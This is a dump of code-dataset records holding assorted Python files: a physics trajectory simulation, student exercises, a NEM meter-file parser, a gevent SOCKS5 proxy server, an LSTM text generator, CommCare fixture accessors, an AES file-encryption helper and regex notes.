as const\n\ng = const.g\ndt = 1e-3\nv0 = 40\n\nangle = math.pi / 4\ntime = np.arange(0,10, dt)\n\ngamm = 0.005\nh = 100\n\ndef traj_fr(angle, v0):\n vx0 = math.cos(angle)*v0 \n vy0 = math.sin(angle)*v0 \n x = np.zeros(len(time)) \n y = np.zeros(len(time))\n\n x[0],y[0] = 0,0 \n x[1],y[1] = x[0] + vx0*(2*dt), y[0]+vy0*(2*dt) \n i=1 \n # \n while y[i]>=0 and i + 1 < len(x): \n f = 0.5 * gamm * (h - y[i]) * dt \n x[i+1] = ((2*x[i]-x[i-1]) + (f * x[i-1])) / (1 + f) \n y[i+1] = ((2*y[i]-y[i-1]) + (f * y[i-1]) - g*(dt**2) ) / (1 + f) \n i = i+1 \n\n x = x[0:i+1] \n y = y[0:i+1] \n return x, y, (dt*i), x[i]\n\nx,y,duration,distance = traj_fr(angle,v0) \nprint ('Distance: ' , distance)\nprint ('Duration: ' , duration) \nn = 5 \nangles = np.linspace(0, math.pi/2, n) \nprint ('Angles: ' , angles) \nmaxrange = np.zeros(n)\n\n\nfor i in range(n): \n x,y,duration,maxrange[i] = traj_fr(angles[i], v0) \n # print(x)\n\nangles = angles / 2 / math.pi * 360 \nprint ('Launch Angles: ', angles)\nprint ('Optimum Angle: ', angles[np.where(maxrange==np.max(maxrange))]) \n\n# print(x)\n# print(y)\n\n# plt.plot(x,y) #quick plot of x vs y to check trajectory \n# plt.xlabel('x') \n# plt.ylabel('y')\n# plt.show()\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472157159","text":"print(\"\"\"\n38. Peça ao usuário para digitar dez valores numéricos e ordene por ordem crescente esses valores, guardando-os num matriz.\nOrdene o valor assim que ele for digitado. Mostre ao final na tela os valores em ordem.\n\"\"\")\n\nvetor = list()\nfor contador in range(10):\n vez = 0\n numero = int(input(f'Insira {contador + 1}º número: '))\n if contador == 0:\n vetor.append(numero)\n elif contador == 1:\n if vetor[0] < numero:\n vetor.append(numero)\n elif vetor[0] > numero:\n vetor.insert(0, numero)\n else:\n for ind, num in enumerate(vetor):\n print(num)\n if num > numero:\n vez += 1\n print(vez)\n vetor.insert(vez, )\n\n\nprint(vetor)\n","sub_path":"Seção_07/parte_1/Exercício_38.py","file_name":"Exercício_38.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"567792631","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/nemreader/nem_reader.py\n# Compiled at: 2019-10-03 03:35:40\n# Size of source mod 2**32: 12845 bytes\n\"\"\"\n nemreader.nem_reader\n ~~~~~\n Read MDFF format\n\"\"\"\nimport os, csv, logging\nfrom datetime import datetime, timedelta\nimport zipfile\nfrom typing import Iterable, Any\nfrom typing import Optional, List, Dict\nfrom .nem_objects import NEMFile, HeaderRecord, NmiDetails\nfrom .nem_objects import Reading, BasicMeterData, IntervalRecord, EventRecord\nfrom .nem_objects import B2BDetails12, B2BDetails13\nlog = logging.getLogger(__name__)\n\ndef flatten_list(l: List[list]) -> list:\n \"\"\" takes a list of lists, l and returns a flat list\n \"\"\"\n return [v for inner_l in l for v in inner_l]\n\n\ndef read_nem_file(file_path: str) -> NEMFile:\n \"\"\" Read in NEM file and return meter readings named tuple\n\n :param file_path: The NEM file to process\n :returns: The file that was created\n \"\"\"\n _, file_extension = os.path.splitext(file_path)\n if file_extension.lower() == '.zip':\n log.debug('Extracting zip file')\n with zipfile.ZipFile(file_path, 'r') as (archive):\n for csv_file in archive.namelist():\n with archive.open(csv_file) as (csv_text):\n nmi_file = csv_text.read().decode('utf-8').splitlines()\n reader = csv.reader(nmi_file, delimiter=',')\n first_row = next(reader, None)\n header = parse_header_row(first_row, file_name=csv_file)\n if header.version_header == 'NEM12':\n return parse_nem12_rows(reader,\n header=header, file_name=csv_file)\n return parse_nem13_rows(reader,\n header=header, file_name=csv_file)\n\n with open(file_path) as (nmi_file):\n return parse_nem_file(nmi_file)\n\n\ndef parse_nem_file(nem_file) -> NEMFile:\n \"\"\" Parse NEM file and return meter readings named tuple \"\"\"\n reader = csv.reader(nem_file, delimiter=',')\n first_row = next(reader, None)\n header = parse_header_row(first_row, file_name=(nem_file.name))\n if header.version_header == 'NEM12':\n return parse_nem12_rows(reader, header=header, file_name=nem_file)\n return parse_nem13_rows(reader, header=header, file_name=nem_file)\n\n\ndef parse_header_row(row: List[Any], file_name=None) -> HeaderRecord:\n \"\"\" Parse first row of NEM file \"\"\"\n record_indicator = int(row[0])\n if record_indicator != 100:\n raise ValueError('NEM Files must start with a 100 row')\n header = parse_100_row(row, file_name)\n if header.version_header not in ('NEM12', 'NEM13'):\n raise ValueError('Invalid NEM version {}'.format(header.version_header))\n log.debug('Parsing %s file %s ...', header.version_header, file_name)\n return header\n\n\ndef parse_100_row(row: List[Any], file_name: str) -> HeaderRecord:\n \"\"\" Parse header record (100) \"\"\"\n return HeaderRecord(row[1], parse_datetime(row[2]), row[3], row[4], file_name)\n\n\ndef parse_nem12_rows(nem_list: Iterable, header: HeaderRecord, file_name=None) -> NEMFile:\n \"\"\" Parse NEM row iterator and return meter readings named tuple \"\"\"\n readings = {}\n trans = {}\n nmi_d = None\n for row in nem_list:\n record_indicator = int(row[0])\n if record_indicator == 900:\n for nmi in readings:\n for suffix in readings[nmi]:\n readings[nmi][suffix] = flatten_list(readings[nmi][suffix])\n\n break\n elif record_indicator == 200:\n try:\n nmi_details = parse_200_row(row)\n except ValueError:\n log.error('Error passing 200 row:')\n log.error(row)\n raise\n\n nmi_d = nmi_details\n if nmi_d.nmi not in readings:\n readings[nmi_d.nmi] = {}\n if nmi_d.nmi_suffix not in readings[nmi_d.nmi]:\n readings[nmi_d.nmi][nmi_d.nmi_suffix] = []\n if nmi_d.nmi not in trans:\n trans[nmi_d.nmi] = {}\n if nmi_d.nmi_suffix not in trans[nmi_d.nmi]:\n trans[nmi_d.nmi][nmi_d.nmi_suffix] = []\n elif record_indicator == 300:\n num_intervals = int(1440 / nmi_d.interval_length)\n assert len(row) > num_intervals, 'Incomplete 300 Row in {}'.format(file_name)\n interval_record = parse_300_row(row, nmi_d.interval_length, nmi_d.uom, nmi_d.meter_serial_number)\n readings[nmi_d.nmi][nmi_d.nmi_suffix].append(interval_record.interval_values)\n elif record_indicator == 400:\n event_record = parse_400_row(row)\n readings[nmi_d.nmi][nmi_d.nmi_suffix][-1] = update_reading_events(readings[nmi_d.nmi][nmi_d.nmi_suffix][(-1)], event_record)\n else:\n if record_indicator == 500:\n b2b_details = parse_500_row(row)\n trans[nmi_d.nmi][nmi_d.nmi_suffix].append(b2b_details)\n else:\n log.warning('Record indicator %s not supported and was skipped', record_indicator)\n\n return NEMFile(header, readings, trans)\n\n\ndef parse_nem13_rows(nem_list: Iterable, header: HeaderRecord, file_name=None) -> NEMFile:\n \"\"\" Parse NEM row iterator and return meter readings named tuple \"\"\"\n readings = {}\n trans = {}\n nmi_d = None\n for row in nem_list:\n record_indicator = int(row[0])\n if record_indicator == 900:\n for nmi in readings:\n for suffix in readings[nmi]:\n readings[nmi][suffix] = flatten_list(readings[nmi][suffix])\n\n break\n elif record_indicator == 550:\n b2b_details = parse_550_row(row)\n trans[nmi_d.nmi][nmi_d.nmi_suffix].append(b2b_details)\n elif record_indicator == 250:\n basic_data = parse_250_row(row)\n reading = calculate_manual_reading(basic_data)\n nmi_d = basic_data\n if basic_data.nmi not in readings:\n readings[nmi_d.nmi] = {}\n if nmi_d.nmi_suffix not in readings[nmi_d.nmi]:\n readings[nmi_d.nmi][nmi_d.nmi_suffix] = []\n if nmi_d.nmi not in trans:\n trans[nmi_d.nmi] = {}\n if nmi_d.nmi_suffix not in trans[nmi_d.nmi]:\n trans[nmi_d.nmi][nmi_d.nmi_suffix] = []\n readings[nmi_d.nmi][nmi_d.nmi_suffix].append([reading])\n else:\n log.warning('Record indicator %s not supported and was skipped', record_indicator)\n\n return NEMFile(header, readings, trans)\n\n\ndef calculate_manual_reading(basic_data: BasicMeterData) -> Reading:\n \"\"\" Calculate the interval between two manual readings \"\"\"\n t_start = basic_data.previous_register_read_datetime\n t_end = basic_data.current_register_read_datetime\n read_start = basic_data.previous_register_read\n read_end = basic_data.current_register_read\n value = basic_data.quantity\n meter_serial_number = basic_data.meter_serial_number\n uom = basic_data.uom\n quality_method = basic_data.current_quality_method\n return Reading(t_start, t_end, value, uom, meter_serial_number, quality_method, '', '', read_start, read_end)\n\n\ndef parse_200_row(row: list) -> NmiDetails:\n \"\"\" Parse NMI data details record (200) \"\"\"\n next_read = None\n if len(row) > 9:\n next_read = parse_datetime(row[9])\n return NmiDetails(row[1], row[2], row[3], row[4], row[5], row[6], row[7], int(row[8]), next_read)\n\n\ndef parse_250_row(row: list) -> BasicMeterData:\n \"\"\" Parse basic meter data record (250) \"\"\"\n return BasicMeterData(row[1], row[2], row[3], row[4], row[5], row[6], row[7], float(row[8]), parse_datetime(row[9]), row[10], row[11], row[12], float(row[13]), parse_datetime(row[14]), row[15], row[16], row[17], float(row[18]), row[19], row[20], parse_datetime(row[21]), parse_datetime(row[22]))\n\n\ndef parse_300_row(row: list, interval: int, uom: str, meter_serial_number: str) -> IntervalRecord:\n \"\"\" Interval data record (300) \"\"\"\n num_intervals = int(1440 / interval)\n interval_date = parse_datetime(row[1])\n last_interval = 2 + num_intervals\n quality_method = row[last_interval]\n reason_code = row[(last_interval + 1)]\n reason_desc = row[(last_interval + 2)]\n update_datetime = parse_datetime(row[(last_interval + 3)])\n msats_load_datatime = parse_datetime(row[(last_interval + 4)])\n interval_values = parse_interval_records(row[2:last_interval], interval_date, interval, uom, quality_method, meter_serial_number, reason_code, reason_desc)\n return IntervalRecord(interval_date, interval_values, quality_method, meter_serial_number, reason_code, reason_desc, update_datetime, msats_load_datatime)\n\n\ndef parse_interval_records(interval_record, interval_date, interval, uom, quality_method, meter_serial_number, event_code: str='', event_desc: str='') -> List[Reading]:\n \"\"\" Convert interval values into tuples with datetime\n \"\"\"\n interval_delta = timedelta(minutes=interval)\n return [Reading(t_start=(interval_date + i * interval_delta), t_end=(interval_date + i * interval_delta + interval_delta), read_value=(parse_reading(val)), uom=uom, quality_method=quality_method, meter_serial_number=meter_serial_number, event_code=event_code, event_desc=event_desc, read_start=None, read_end=None) for i, val in enumerate(interval_record)]\n\n\ndef parse_reading(val: str) -> Optional[float]:\n \"\"\" Convert reading value to float (if possible) \"\"\"\n try:\n return float(val)\n except ValueError:\n log.warning('Reading of \"%s\" is not a number', val)\n return\n\n\ndef parse_400_row(row: list) -> tuple:\n \"\"\" Interval event record (400) \"\"\"\n return EventRecord(int(row[1]), int(row[2]), row[3], row[4], row[5])\n\n\ndef update_reading_events(readings, event_record):\n \"\"\" Updates readings from a 300 row to reflect any events found in a\n subsequent 400 row\n \"\"\"\n for i in range(event_record.start_interval - 1, event_record.end_interval):\n readings[i] = Reading(t_start=(readings[i].t_start),\n t_end=(readings[i].t_end),\n read_value=(readings[i].read_value),\n uom=(readings[i].uom),\n meter_serial_number=(readings[i].meter_serial_number),\n quality_method=(event_record.quality_method),\n event_code=(event_record.reason_code),\n event_desc=(event_record.reason_description),\n read_start=(readings[i].read_start),\n read_end=(readings[i].read_end))\n\n return readings\n\n\ndef parse_500_row(row: list) -> tuple:\n \"\"\" Parse B2B details record \"\"\"\n return B2BDetails12(row[1], row[2], row[3], row[4])\n\n\ndef parse_550_row(row: list) -> tuple:\n \"\"\" Parse B2B details record \"\"\"\n return B2BDetails13(row[1], row[2], row[3], row[4])\n\n\ndef parse_datetime(record: str) -> Optional[datetime]:\n \"\"\" Parse a datetime string into a python datetime object \"\"\"\n format_strings = {8:'%Y%m%d', \n 12:'%Y%m%d%H%M', 14:'%Y%m%d%H%M%S'}\n if record == '':\n return\n return datetime.strptime(record.strip(), format_strings[len(record.strip())])","sub_path":"pycfiles/nemreader-0.4-py3.7/nem_reader.cpython-37.py","file_name":"nem_reader.cpython-37.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"437768907","text":"import gevent\nfrom gevent import monkey\nfrom gevent.pool import Pool\nfrom gevent import select\nfrom gevent.server import StreamServer\nfrom gevent import socket\n\n\nmonkey.patch_all()\n\nBUFFER = 4096\nSOCK_V5 = 5\nRSV = 0\nATYP_IP_V4 = 1\nATYP_DOMAINNAME = 3\nCMD_CONNECT = 1\nIMPLEMENTED_METHODS = (2, 0)\n\n\nclass SockV5Server(object):\n\n def __init__(self, port=1080):\n self.port = port\n self.pool = Pool(1000)\n self.server = StreamServer(('0.0.0.0', self.port),\n self.handler)\n\n def close_sock_and_exit(self, client_sock=None, server_sock=None):\n if client_sock:\n if not client_sock.closed:\n client_sock.close()\n\n if server_sock:\n if not server_sock.closed:\n server_sock.close()\n\n g = gevent.getcurrent()\n g.kill()\n\n def process_version_and_auth(self, client_sock):\n \"\"\"Request format:\n\n +----+----------+----------+\n |VER | NMETHODS | METHODS |\n +----+----------+----------+\n | 1 | 1 | 1 to 255 |\n +----+----------+----------+\n\n Response format:\n\n +----+--------+\n |VER | METHOD |\n +----+--------+\n | 1 | 1 |\n +----+--------+\n\n The values currently defined for METHOD are:\n\n o X'00' NO AUTHENTICATION REQUIRED\n o X'01' GSSAPI\n o X'02' USERNAME/PASSWORD\n o X'03' to X'7F' IANA ASSIGNED\n o X'80' to X'FE' RESERVED FOR PRIVATE METHODS\n o X'FF' NO ACCEPTABLE METHODS\n \"\"\"\n\n recv = client_sock.recv(BUFFER)\n if ord(recv[0]) != SOCK_V5:\n self.close_sock_and_exit(client_sock)\n\n method = None\n num_methods = ord(recv[1])\n methods = [ord(recv[i + 2]) for i in range(num_methods)]\n for imp_method in IMPLEMENTED_METHODS:\n if imp_method in methods:\n method = imp_method\n break\n\n if method is None:\n self.close_sock_and_exit(client_sock)\n\n send_msg = '\\x05' + chr(method)\n client_sock.send(send_msg)\n\n # if method:\n # self.process_authentication()\n #\n # NOTE(deliang), only NO AUTHENTICATION REQUIRED has been implemented\n # here. The USERNAME/PASSWORD will be implemented in following.\n #\n # Username/Password Authentication for SOCKS V5\n # https://tools.ietf.org/html/rfc1929\n\n def process_sock_request(self, client_sock):\n \"\"\"The SOCKS request is formed as follows:\n\n +----+-----+-------+------+----------+----------+\n |VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT |\n +----+-----+-------+------+----------+----------+\n | 1 | 1 | X'00' | 1 | Variable | 2 |\n +----+-----+-------+------+----------+----------+\n\n o VER protocol version: X'05'\n o CMD\n o CONNECT X'01'\n o BIND X'02'\n o UDP ASSOCIATE X'03'\n o RSV RESERVED\n o ATYP address type of following address\n o IP V4 address: X'01'\n o DOMAINNAME: X'03'\n o IP V6 address: X'04'\n o DST.ADDR desired destination address\n o DST.PORT desired destination port in network octet\n order\n\n\n The SOCKS reply is formed as follows:\n\n +----+-----+-------+------+----------+----------+\n |VER | REP | RSV | ATYP | BND.ADDR | BND.PORT |\n +----+-----+-------+------+----------+----------+\n | 1 | 1 | X'00' | 1 | Variable | 2 |\n +----+-----+-------+------+----------+----------+\n\n o VER protocol version: X'05'\n o REP Reply field:\n o X'00' succeeded\n o X'01' general SOCKS server failure\n o X'02' connection not allowed by ruleset\n o X'03' Network unreachable\n o X'04' Host unreachable\n o X'05' Connection refused\n o X'06' TTL expired\n o X'07' Command not supported\n o X'08' Address type not supported\n o X'09' to X'FF' unassigned\n o RSV RESERVED\n o ATYP address type of following address\n o IP V4 address: X'01'\n o DOMAINNAME: X'03'\n o IP V6 address: X'04'\n o BND.ADDR server bound address\n o BND.PORT server bound port in network octet order\n \"\"\"\n\n recv = client_sock.recv(BUFFER)\n if ord(recv[0]) != SOCK_V5 or ord(recv[2]) != RSV:\n self.close_sock_and_exit(client_sock)\n\n addr_type = ord(recv[3])\n if addr_type == ATYP_IP_V4:\n addr = socket.inet_ntoa(recv[4:8])\n elif addr_type == ATYP_DOMAINNAME:\n addr_len = ord(recv[4])\n addr = socket.gethostbyname(recv[5:5 + addr_len])\n else:\n # only ipv4 addr or domain name is supported.\n self.close_sock_and_exit(client_sock)\n\n port = ord(recv[-2]) * 256 + ord(recv[-1])\n\n cmd = ord(recv[1])\n if cmd == CMD_CONNECT:\n # Only connect cmd is supported.\n server_sock = self.connect_target_server_and_reply(client_sock,\n addr, port, cmd)\n else:\n self.close_sock_and_exit(client_sock)\n\n return server_sock\n\n def connect_target_server_and_reply(self, client_sock, addr, port, cmd):\n sock_name = client_sock.getsockname()\n server_hex_addr = socket.inet_aton(sock_name[0])\n server_hex_port = self.port_to_hex_string(sock_name[1])\n server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n server_sock.connect((addr, port))\n send_msg = '\\x05\\x00\\x00\\x01' + server_hex_addr + server_hex_port\n client_sock.send(send_msg)\n except Exception:\n send_msg = '\\x05\\x01\\x00\\x01' + server_hex_addr + server_hex_port\n client_sock.send(send_msg)\n self.close_sock_and_exit(client_sock)\n\n return server_sock\n\n def piping_client_and_target(self, client_sock, server_sock):\n inputs = [client_sock, server_sock]\n while True:\n try:\n in_ready, out_ready, ex_ready = select.select(inputs, [], [])\n for sock in in_ready:\n if sock == client_sock:\n self.recv_and_send_msg(client_sock, server_sock)\n elif sock == server_sock:\n self.recv_and_send_msg(server_sock, client_sock)\n except Exception:\n self.close_sock_and_exit(client_sock, server_sock)\n\n def recv_and_send_msg(self, recv_sock, send_sock):\n # recv() is a block I/O, it returns '' when remote has been closed.\n msg = recv_sock.recv(BUFFER)\n if msg == '':\n self.close_sock_and_exit(recv_sock, send_sock)\n\n send_sock.sendall(msg)\n\n def port_to_hex_string(self, int_port):\n port_hex_string = chr(int_port / 256) + chr(int_port % 256)\n return port_hex_string\n\n def handler(self, client_sock, address):\n # -----------------------------------------------#\n # SOCKS Protocol Version 5 |\n # https://www.ietf.org/rfc/rfc1928.txt |\n # -----------------------------------------------#\n\n self.process_version_and_auth(client_sock)\n server_sock = self.process_sock_request(client_sock)\n self.piping_client_and_target(client_sock, server_sock)\n\n def serve_forever(self):\n self.server.serve_forever()\n\n\nif '__main__' == __name__:\n sock_v5_server = SockV5Server(1080)\n sock_v5_server.serve_forever()\n","sub_path":"python/funny_talk/ss5/ss5/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"51195670","text":"from __future__ import print_function\r\nimport sys\r\nimport codecs\r\nimport os\r\n\r\nimport numpy as np\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation\r\nfrom keras.layers.recurrent import LSTM\r\nfrom keras.optimizers import RMSprop\r\n\r\nimport MeCab\r\n\r\n\r\nn_hidden_neurons = 128\r\nn_batch_size = 128\r\nn_sequence = 12\r\nn_step = 3\r\nn_epochs = 1\r\n\r\ntextfile = 'data/yumeno.txt'\r\n\r\nresult_dir = 'lstm_results_bs128_Sq12_ma'\r\nif not os.path.exists(result_dir):\r\n os.mkdir(result_dir)\r\n\r\n\r\n# input data\r\ndef load_data(filename):\r\n vocab = {}\r\n words = []\r\n mecab = MeCab.Tagger('-Owakati')\r\n with codecs.open(filename, 'rb', 'utf-8') as file:\r\n lines = file.readlines()\r\n w = [mecab.parse(line.replace('\\n', '').replace('\\r', '')).split(' ') for line in lines]\r\n words = [i for inner in w for i in inner]\r\n\r\n chars = sorted(list(set(words)))\r\n char_indices = {c: i for i, c in enumerate(chars)}\r\n indices_char = {i: c for i, c in enumerate(chars)}\r\n return words, chars, char_indices, indices_char\r\n\r\n\r\ndef vectorize(words, chars, char_indices):\r\n sentences = []\r\n next_chars = []\r\n for i in range(0, len(words) - n_sequence, n_step):\r\n sentences.append(words[i:i+n_sequence])\r\n next_chars.append(words[i+n_sequence])\r\n\r\n # ヴェクトル化\r\n print(len(sentences), n_sequence, len(chars), '=', len(sentences) * n_sequence * len(chars))\r\n X = np.zeros((len(sentences), n_sequence, len(chars)), dtype=np.bool)\r\n y = np.zeros((len(sentences), len(chars)), dtype=np.bool)\r\n for i, sentence in enumerate(sentences):\r\n for t, char in enumerate(sentence):\r\n X[i, t, char_indices[char]] = 1\r\n y[i, char_indices[next_chars[i]]] = 1\r\n return X, y\r\n\r\n\r\ndef create_model(n_sequence, n_vocabs, n_hidden_neurons):\r\n \"\"\"\r\n n_vocabs: 語彙数\r\n \"\"\"\r\n model = Sequential()\r\n model.add(LSTM(n_hidden_neurons, input_shape=(n_sequence, n_vocabs)))\r\n model.add(Dense(n_vocabs))\r\n model.add(Activation('softmax'))\r\n\r\n return model\r\n\r\n\r\ndef save_model(model, path, name):\r\n \"\"\"\r\n 学習したモデルと重みと履歴を保存するのです。\r\n \"\"\"\r\n model_json = model.to_json()\r\n with open(os.path.join(path, name + '.json'), 'w') as json_file:\r\n json_file.write(model_json)\r\n model.save_weights(os.path.join(path, name + '.h5'))\r\n\r\n\r\n\r\nwords, chars, char_indices, _ = load_data(textfile)\r\n\r\nX, y = vectorize(words, chars, char_indices)\r\n\r\n\r\nmodel = create_model(n_sequence, len(chars), n_hidden_neurons)\r\noptimizer = RMSprop(lr=0.01)\r\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=optimizer, metrics=['accuracy'])\r\n\r\nmodel.fit(X, y, batch_size=n_batch_size, epochs=n_epochs, verbose=1)\r\n\r\n\r\n# モデルを保存\r\nsave_model(model, result_dir, \"model\")\r\n","sub_path":"docgen_train.py","file_name":"docgen_train.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"346588230","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Description: 二分查找\n\"\"\"\n\n\ndef binary_search(sequence, key):\n \"\"\"sequence 是一个有序序列\"\"\"\n low = 0\n height = len(sequence) - 1\n time = 0\n while low < height:\n time += 1\n mid = (low + height) // 2\n if key < sequence[mid]:\n height = mid - 1\n\n elif key > sequence[mid]:\n low = mid + 1\n else:\n print(\"times: \", time)\n return mid\n\n print(\"times: \", time)\n return None\n\n\nif __name__ == '__main__':\n LIST = [1, 5, 7, 8, 22, 54, 99, 123, 200, 222, 444]\n result = binary_search(LIST, 99)\n print(result)\n","sub_path":"Data_Structures-and-Algorithm/algorithm_code/search/binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"638879324","text":"from dimagi.utils.couch.database import iter_bulk_delete\n\nfrom corehq.util.couch_helpers import paginate_view\nfrom corehq.util.quickcache import quickcache\nfrom corehq.util.test_utils import unit_testing_only\n\n\ndef count_fixture_data_types(domain):\n from corehq.apps.fixtures.models import FixtureDataType\n num_fixtures = FixtureDataType.get_db().view(\n 'by_domain_doc_type_date/view',\n startkey=[domain, 'FixtureDataType'],\n endkey=[domain, 'FixtureDataType', {}],\n reduce=True,\n group_level=2,\n ).first()\n return num_fixtures['value'] if num_fixtures is not None else 0\n\n\n@quickcache(['domain'], timeout=30 * 60)\ndef get_fixture_data_types(domain):\n from corehq.apps.fixtures.models import FixtureDataType\n return list(FixtureDataType.view(\n 'by_domain_doc_type_date/view',\n endkey=[domain, 'FixtureDataType'],\n startkey=[domain, 'FixtureDataType', {}],\n reduce=False,\n include_docs=True,\n descending=True,\n ))\n\n\ndef get_fixture_data_type_by_tag(domain, tag):\n data_types = get_fixture_data_types(domain)\n for data_type in data_types:\n if data_type.tag == tag:\n return data_type\n return None\n\n\n@quickcache(['domain', 'data_type_id'], timeout=60 * 60, memoize_timeout=60, skip_arg='bypass_cache')\ndef get_fixture_items_for_data_type(domain, data_type_id, bypass_cache=False):\n from corehq.apps.fixtures.models import FixtureDataItem\n return list(FixtureDataItem.view(\n 'fixtures/data_items_by_domain_type',\n startkey=[domain, data_type_id],\n endkey=[domain, data_type_id, {}],\n reduce=False,\n include_docs=True,\n ))\n\n\ndef delete_fixture_items_for_data_type(domain, data_type_id):\n from corehq.apps.fixtures.models import FixtureDataItem\n iter_bulk_delete(FixtureDataItem.get_db(), [\n i[\"_id\"] for i in iter_fixture_items_for_data_type(domain, data_type_id)\n ])\n\n\ndef iter_fixture_items_for_data_type(domain, data_type_id):\n from corehq.apps.fixtures.models import FixtureDataItem\n for row in paginate_view(\n FixtureDataItem.get_db(),\n 'fixtures/data_items_by_domain_type',\n chunk_size=1000,\n startkey=[domain, data_type_id],\n endkey=[domain, data_type_id, {}],\n reduce=False,\n include_docs=True\n ):\n yield FixtureDataItem.wrap(row['doc'])\n\n\ndef count_fixture_items(domain, data_type_id):\n from corehq.apps.fixtures.models import FixtureDataItem\n return FixtureDataItem.view(\n 'fixtures/data_items_by_domain_type',\n startkey=[domain, data_type_id],\n endkey=[domain, data_type_id, {}],\n reduce=True,\n ).first()['value']\n\n\ndef get_owner_ids_by_type(domain, owner_type, data_item_id):\n from corehq.apps.fixtures.models import FixtureOwnership\n assert owner_type in FixtureOwnership.owner_type.choices, \\\n \"Owner type must be in {}\".format(FixtureOwnership.owner_type.choices)\n return FixtureOwnership.get_db().view(\n 'fixtures/ownership',\n key=[domain, '{} by data_item'.format(owner_type), data_item_id],\n reduce=False,\n wrapper=lambda r: r['value']\n )\n\n\n@unit_testing_only\ndef delete_all_fixture_data_types():\n from corehq.apps.fixtures.models import FixtureDataType\n\n results = FixtureDataType.get_db().view('fixtures/data_types_by_domain_tag', reduce=False).all()\n for result in results:\n try:\n fixture_data_type = FixtureDataType.get(result['id'])\n except Exception:\n pass\n else:\n fixture_data_type.delete()\n","sub_path":"corehq/apps/fixtures/dbaccessors.py","file_name":"dbaccessors.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642049949","text":"from os import SEEK_END\nfrom hashlib import sha3_512\nimport struct\nfrom base64 import b16decode, b16encode\nfrom Crypto.Cipher import AES\nfrom Crypto.Random import get_random_bytes\nfrom django.core.files.base import File\nfrom django.conf import settings\n\n\ndef secret_key_aes():\n k = settings.SECRET_KEY\n if len(k) < 32:\n k = k.ljust(32, ' ')\n return AES.new(bytes(k, encoding='utf8')[:16],\n AES.MODE_CBC, bytes(k, encoding='utf8')[16:32])\n\n\nclass AESCrypto:\n _header_size = struct.calcsize(' bytes:\n return get_random_bytes(16)\n\n @staticmethod\n def gen_key(keylen):\n return get_random_bytes(keylen)\n\n @staticmethod\n def key2str(key) -> str:\n s = secret_key_aes().encrypt(key)\n s = str(b16encode(s), encoding='utf-8')\n return s\n\n @staticmethod\n def str2key(s) -> bytes:\n s = s.upper()\n key = b16decode(bytes(s, encoding='utf-8'))\n key = secret_key_aes().decrypt(key)\n return key\n\n @staticmethod\n def key_hash(k: bytes):\n kh = sha3_512(k).hexdigest()\n return kh\n\n def aes(self, iv: bytes):\n return AES.new(self.key, AES.MODE_CBC, iv)\n\n def file_header_data(self, file_size, iv):\n return struct.pack(' ori_data_size:\n yield ori_data\n else:\n # remove padding spaces\n yield ori_data[:remaining_file_size]\n remaining_file_size -= ori_data_size\n encrypted_file.close()\n\n @property\n def key_str(self):\n return self.key2str(self.key)\n","sub_path":"utils/utils/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325137970","text":"import re\n\ns = '1qq123jkl833k3dkdk66pd0PHP'\n\n\n# 定义正则表达式函数\ndef convert(value):\n # #找到指定的字符串,返回前后拼接下划线\n # mathod = value.group()\n # return \"__\" + mathod + \"__\"\n mathod = value.group()\n if int(mathod) > 6:\n mathod = '0'\n elif int(mathod) < 6:\n mathod = '9'\n else:\n mathod = 'w3'\n\n return mathod\n\n\n# r = re.sub('\\d', convert, s)\n# r = re.sub('PHP', convert, s)#找到指定的字符串,返回前后拼接下划线\n# r = re.findall('\\D', s, re.I) #正则查找查找\n# print(r)\n#\n# r1 = re.match('\\d', s) # 返回none,特征从字符串的首字母匹配,如果没有匹配到数字,返回none\n# r2 = re.search('\\d', s) # 特征,搜索整个字符串,一旦找到结果,马上返回结果\n# print(r1.group()) # 利用group方法提取匹配到的结果\n# print(r2.group())\n\na = 'life is shot i use python , i love python'\n\nr3 = re.search('life(.*)python', a) # 普通字符可以当做一个字符串的定界符,life是开始,python时是结尾,用小括号分组\nprint(r3.group(1)) # group的意义在于获取分组的匹配,默认是0,group(0)是一个特殊的表达方法,永远返回的都是完整的字符串,取值从1开始\nprint(re.findall('life(.*)python', a)) # findall直接返回匹配到的结果\nr4 = re.search('life(.*)python(.*)python', a) # 多个分组\nprint(r4.group(0, 1, 2)) # 返回多个分组\nprint(r4.groups()) # 返回匹配到的多个分组\n","sub_path":"home-study/study-code/python-code/six/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"606161144","text":"import re\r\nfrom glob import glob\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfilenames = glob('baby_names/*.txt') \r\nssa_df_list = []\r\nfor file in filenames:\r\n temp_df = pd.read_csv(file, names = ['names','sex','count'])\r\n year = int(re.findall('\\d\\d\\d\\d', file)[0])\r\n \r\n if year 